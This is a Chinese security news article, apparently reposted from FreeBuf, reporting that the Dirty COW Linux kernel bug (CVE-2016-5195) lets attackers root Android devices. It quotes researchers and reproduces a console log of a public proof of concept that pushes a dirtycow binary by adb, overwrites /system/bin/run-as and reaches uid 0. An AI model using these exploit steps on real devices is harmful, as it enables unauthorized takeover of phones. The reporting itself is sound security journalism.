android local root,脏牛漏洞影响范围超出想象,以后所有Android手机都能被Root?

原标题:脏牛漏洞影响范围超出想象,以后所有Android手机都能被Root?

【新朋友】点击标题下面蓝字「皮鲁安全之家」关注

【老朋友】点击右上角,分享或收藏本页精彩内容

【公众号】搜索公众号:皮鲁安全之家,或者ID :piluwill

上周,研究人员Phil Oester发现 “脏牛”漏洞,影响范围甚广,波及到2007年发布的Linux内核,一时间名声大噪。

脏牛漏洞,编号为CVE-2016-5195,是Linux内核运行时出现的竞争条件,允许攻击者实现本地提权。简而言之,攻击者利用脏牛可获得Linux设备的root权限。(详情请参考此前漏洞盒子发布的)

影响所有Android版本

脏牛刚被发现时,我们不清楚基于Linux内核的Android操作系统是否也受到了影响。发现脏牛的Phil Oester并没有检测Android系统上有否存在此漏洞。好在,另一名安全研究人员David Manouchehri对Android进行了检测,并于周日在上公布了PoC。

$ make run

ndk-build NDK_PROJECT_PATH=. APP_BUILD_=./Android.mk

make[1]: Entering directory `./CVE-2016-5195'

[armeabi] Install : dirtycow => libs/armeabi/dirtycow

[armeabi] Install : run-as => libs/armeabi/run-as

make[1]: Leaving directory `./CVE-2016-5195'

adb push libs/armeabi/dirtycow /data/local/tmp/dirtycow

[100%] /data/local/tmp/dirtycow

adb push libs/armeabi/run-as/data/local/tmp/run-as

[100%] /data/local/tmp/run-as

adb shell 'chmod 777 /data/local/tmp/run-as'

adb shell '/data/local/tmp/dirtycow /system/bin/run-as /data/local/tmp/run-as'

warning: newfile size (9464) andfile old size (17944) differ

size 17944

[*] mmap 0xb51e5000

[*] exploit (patch)

[*] currently 0xb51e5000=464c457f

[*] madvise = 0xb51e500017944

[*] madvise = 01048576

[*] /proc/self/mem 16357785601048576

[*] exploited 0xb51e5000=464c457f

adb shell /system/bin/run-as

running asuid 2000

uid 0

Manouchehri在一篇推文中提到,他利用脏牛获得了一台Android 6.0.1设备的root权限。在ArsTechnica的采访中,Manouchehri表示——Android 1.0以后的所有版本似乎都存在脏牛漏洞。

“对于熟悉Android文件系统的人来说,这个操作很简单。在我看来,利用这个漏洞,理论上可以在任何一台Android设备上实现提权,因为Android 1.0是基于Linux kernel 2.6.25的,而脏牛漏洞在2.6.22里就已经存在了。”

还有一位不愿透露姓名的独立安全研究人员表示,他与其他几人也利用脏牛漏洞写了Android的root利用代码,还为之增加了一些新的功能。在被问到为什么不愿意公开代码或者姓名时,这名研究人员表示:“我们用的是一种比较特殊的技术方式,将来还可以用在其他地方。”

下面的视频展示了这位研究人员如何用他的app,在一台HTC手机上获取root权限;这台手机通过USB数据线与电脑连接。首先执行ID命令和su命令,我们可以看到这个设备没有被root。运行“moo”之后(牛叫声!“moo”是包含这个漏洞利用代码的文件),再次执行ID命令和su命令,明显可以看到这台HTC手机被root了。

此前似乎低估了脏牛的威力

脏牛一开始出现的时候,引起了不小的反响,当时研究人员认为业界夸大了脏牛的危害,还特别制作了各种周边来嘲讽这种夸张的反应。

但是现在,脏牛的破坏力似乎已经超出了他们的预期。不过,要利用脏牛还是很难的,因为只有在多种条件都得到满足的前提下,才能触发内核的竞争条件,但是脏牛的危险仍然存在。自从脏牛被发现以来,Linux内核团队已修复多个发行版本。

*参考来源:http://news.softpedia.com/news/dirty-cow-exploit-can-root-android-devices-509590.shtml

http://arstechnica.com/security/2016/10/android-phones-rooted-by-most-serious-linux-escalation-bug-ever/

来自FreeBuf

a4fbf36c5e4df8e52b2432e018d53339.png

回复

获得以下图文等信息

论坛

可进入微论坛畅谈

任意

官方机器人陪聊

首页

查看技术文档(逐步更新中)

留言

进入留言板

相册

责任编辑:

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值